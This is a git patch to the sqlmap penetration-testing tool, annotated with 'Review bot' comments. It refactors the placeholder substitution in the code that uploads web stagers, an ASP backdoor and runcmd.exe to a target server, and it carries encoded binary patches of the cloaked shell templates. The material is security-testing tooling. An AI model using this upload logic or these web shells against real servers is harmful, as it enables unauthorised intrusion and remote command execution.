From faaae2b647eb99498845ef9e26e52154495d4549 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Thu, 8 Feb 2018 17:08:44 +0100
Subject: [PATCH] Minor refactoring
---
lib/core/settings.py | 6 +++++-
lib/takeover/web.py | 8 +++++---
shell/backdoors/backdoor.asp_ | Bin 240 -> 243 bytes
shell/stagers/stager.asp_ | Bin 1199 -> 1201 bytes
shell/stagers/stager.aspx_ | Bin 527 -> 529 bytes
shell/stagers/stager.jsp_ | Bin 1320 -> 1321 bytes
shell/stagers/stager.php_ | Bin 377 -> 379 bytes
txt/checksum.md5 | 14 +++++++-------
8 files changed, 17 insertions(+), 11 deletions(-)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 741fe3c27..118286cc6 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
 from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.2.8"
+VERSION = "1.2.2.9"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -299,6 +299,10 @@ BASIC_HELP_ITEMS = (
 "wizard",
 )
+# Tags used for value replacements inside shell scripts
+SHELL_WRITABLE_DIR_TAG = "%WRITABLE_DIR%"
+SHELL_RUNCMD_EXE_TAG = "%RUNCMD_EXE%"
+
 # String representation for NULL value
 NULL = "NULL"
diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index 2952a127f..2395b06b2 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
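Review bot: The comment added above `SHELL_WRITABLE_DIR_TAG` and `SHELL_RUNCMD_EXE_TAG` in lib/core/settings.py does not say that these strings have to match, byte for byte, the placeholders embedded in the cloaked template files under shell/. Those files are shipped in this commit only as binary patches, so the match cannot be checked from the diff. The call sites in lib/takeover/web.py use plain `.replace(...)`, so a template that still carries the old bare `WRITABLE_DIR` text would pass through unsubstituted without any error. I would extend the comment to `# Tags used for value replacements inside shell scripts (must match the placeholders inside the cloaked files under shell/; regenerate those files and txt/checksum.md5 when a tag changes)`.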
@@ -47,6 +47,8 @@ from lib.core.enums import WEB_API
 from lib.core.exception import SqlmapNoneDataException
 from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
 from lib.core.settings import EVENTVALIDATION_REGEX
+from lib.core.settings import SHELL_RUNCMD_EXE_TAG
+from lib.core.settings import SHELL_WRITABLE_DIR_TAG
 from lib.core.settings import VIEWSTATE_REGEX
 from lib.request.connect import Connect as Request
 from thirdparty.oset.pyoset import oset
@@ -134,7 +136,7 @@ class Web:
 def _webFileInject(self, fileContent, fileName, directory):
 outFile = posixpath.join(ntToPosixSlashes(directory), fileName)
- uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
+ uplQuery = getUnicode(fileContent).replace(SHELL_WRITABLE_DIR_TAG, directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
 query = ""
 if isTechniqueAvailable(kb.technique):
@@ -324,7 +326,7 @@ class Web:
 with open(filename, "w+b") as f:
 _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stagers", "stager.%s_" % self.webApi))
- _ = _.replace("WRITABLE_DIR", utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory))
+ _ = _.replace(SHELL_WRITABLE_DIR_TAG, utf8encode(directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory))
 f.write(_)
 self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)
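Review bot: The expression `directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory` is still written out inline in the changed line of `_webFileInject` and again in the stager hunk at `@@ -324,7 +326,7 @@`, so this refactoring names the tag but leaves the substituted value duplicated. Binding it once per function, e.g. `writableDir = directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory`, would shorten both `.replace(SHELL_WRITABLE_DIR_TAG, ...)` calls and keep the two sites from drifting apart. In the stager hunk the template content is also held in `_`, which reads as a throwaway name although the value is written to the file; a descriptive name such as `content` would be clearer. Both enclosing functions start and end outside the visible hunks, so other uses of these values may exist that are not shown here.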
@@ -369,7 +371,7 @@ class Web: continue _ = "tmpe%s.exe" % randomStr(lowercase=True) - if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)): + if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace(SHELL_WRITABLE_DIR_TAG, backdoorDirectory).replace(SHELL_RUNCMD_EXE_TAG, _)): self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_EXTRAS_PATH, "runcmd", "runcmd.exe_")) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName) self.webDirectory = backdoorDirectory diff --git a/shell/backdoors/backdoor.asp_ b/shell/backdoors/backdoor.asp_ index d126faee7dc5a9a89bf0bedd9fd38fc780106cb0..9f9a20586cb42b43b9922e9cec98653d51e8445e 100644 GIT binary patch literal 243 zcmVJoQ00dF~d)9I`{sHkyaO7CB^hRo09;0%qzxvN zR08wGB1%%4_whjLs1mw3L3mFo_%*OCUD!hM1iZr)4gqpQ7$`@Z$I t5{c{;F9gDEJ;WbQZtU~=1M3iejpNV=T=LRMapyrmc@AlN3ykH$+V<3lOIHP{$ZPj z*L|_`2ku4;20Ked=n5K|!NGbLOHdal6%XeR{RhO#%@(OFTJLqH5IdI9_*jzTzbjFS z4XqJCx$CAn{TctF&f2C#uvX~s3*H8PsWG*9azT$50@#n?w_x2*hGCR#xrYWf@x(Ar zYcSYufUm?Wn~5l_zz8d{xV*~530BpEy3f-dzO%?R(?^`T17!GJcgRG45eE4HQh3|| 
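Review bot: In the `webUpload(...)` call of the `@@ -369,7 +371,7 @@` hunk, `backdoorDirectory` is substituted for `SHELL_WRITABLE_DIR_TAG` unchanged, whereas the two other call sites in lib/takeover/web.py first turn `/` into `\\\\` when `Backend.isOs(OS.WINDOWS)` is true. The surrounding lines (`runcmd.exe_`, `/Scripts/`) suggest this branch is Windows-specific, so it would help to either apply the same conversion or add a short comment stating why the value is already in the form the template expects. The name `_` also carries a meaningful value here, the generated executable name that is later passed to `replace(SHELL_RUNCMD_EXE_TAG, _)` and `webUpload(_, ...)`; something like `runcmdName = "tmpe%s.exe" % randomStr(lowercase=True)` would read better. The enclosing method begins and ends outside the hunk.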
diff --git a/shell/stagers/stager.asp_ b/shell/stagers/stager.asp_ index 75a64c1fc4158402453f7ba8b05da736f4c397a4..7918d6ac7aa9aa2dceb74c6b9727606327146241 100644 GIT binary patch literal 1201 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 literal 1320 zcmV+@1=soqoRult5!*R$0_P}P-K3fRq4d(143G}H|-qdQFvR8u(PWFpUPy?uvydU^(t(b6jkE#{y z0E%IvuxVCs06JzVij*orb6MW#)d)Y5kP(W!Yb8z1!{Z^Nqu#e3#macjI|uB;tBHrY zI3X^_Lo(nYloqyvYHZWI&S@^WbgqO~?v=t~`y;b8KdGL*d3UhYjydt4OSjH)m(Q0K_8gPCFkcQzfwSmlwmTpsPz^ z*H##TlycWD3X_-YlCyHldx{H{ILGTHB|ocyCFoVnj1q+@Ook$*hltngZ`j~Z05 zIl9|%z6b3{^&m|ymzlLe^u7oCX82rTRbsP2TBv6&v)~rSOD~FM-5t!$mc>rAU5aTa z#HAUDAx-ohsnL{-YFc>}lb&Ub(G;5z(+mlU{GccQGusK2%oHcGf;e_`Me_!y*JcZI zbBWqDwNG&TmT&!^z}fRrWh*TyRO`r$Yhr@xd10{$2>bS@tNYoXmlx=p*QfYo%JrLz 
zK=kU_>2G;_1Hf`5I#1np=Iz(D+ch)akj)+F1~&>^sU?6mJ;#Eqrj;x*Nu7~-Kh%sU z6EMr~_x)^0!66Tp*IiR@xOe=~B@_4?w9LzL$h4UIeO}K3*iW&}X!s)J@|zlVl~+*{ z6;aY%RmFhR`inO^3;<1vSk)N5iFL_O)OydU4LE~mx5~*^&59*}Nj|xbNwvqN`~_VN zAjg}OW6K4@g}2fjqZ)fzT#0;OO=-Uh+{DBRjyR;-GnM`_sgkicpyeN*6Vs0?9{EE5 z)TdpiBR7Wnz~7arz>bQeKA83&FO~XQlrwr-}YyiQZq) z$5ic~oNp`FvPNESF%nm>(*?Pt8MV$K%2}l2%kX%#D-}Q5URX0%mLd7IFwAA(Dc`N6de*i{QuGJIs;!N z=X@n#;4W`_G`3cQm1z(Z;afyWHfPH+@H@FIsAEcuiT>z(t1Id=e za0V^NORq()Mt5{3zaLj2EVrCc1IxL89(!s8fa99Tu)4jU$-q z>x=DeJWvsoQa3_SHv)aY+jasi%1|k#d eY+&}o3`{c46->@(5P%IN1U)XiKK*nc;xPJ@u#(UK diff --git a/shell/stagers/stager.php_ b/shell/stagers/stager.php_ index 64f8eacabdfe758595297d199003ff5c069690f2..54c8930a26d54df1f70408548752b0f64b8ddf5e 100644 GIT binary patch literal 379 zcmV->0fhbsoSl;I6oNlv#^3iSV>ppLvx3DRsny6=7p$rK!8^pfbZ|q@ofuOc|NAk` zE{wg{1LFqI0-oo&Q0kLY&LtaoYm(Pd8A~n4M~Y^E zbh&<-S0~qe$0gGUj4W?CJ#o*F58x;Evl;{sv)st_1%3i@eTq8FkS=k1;7e_Xb7ZtP zd&xaf`lZEcbvhU7Tg`QTRYF;J;cJxrjr-XY3b()}y(S-ES$au^gXT{4t(m`AOU%IT ztX0?hBv$dpwGFCqEB@uGl6sS);74tYU=hIvdVxSO*!N%zb?>~`R0s)JWX&iE$Go8O Z9W=>$2!iTxEU!@$%04m7)@Z_R>iXz6y($0z literal 377 zcmV-<0fznuoSl*)6v9tuh41}pUU#Tzi)1|318~*|} zt2}1A*ag!|SkFdSP_;QaCA7$C7o=0M(AtsjK|#4bxPmH?v1h@xu3*}T5BrBpT4Sy< z#Wjy&=2{-PrX-yd93S*VlG>7U+wBHt1(Ek}gwYeR3xjGa+Yh~h1~cW`V=T7AE*yz2 zq$}+RH_%-bz^)Y`z)7u5 zK8l!&p0c<-v4~=eazMs6-2#bQnn{){dDINsSKthhS4$Ak8#(LPE zD&;8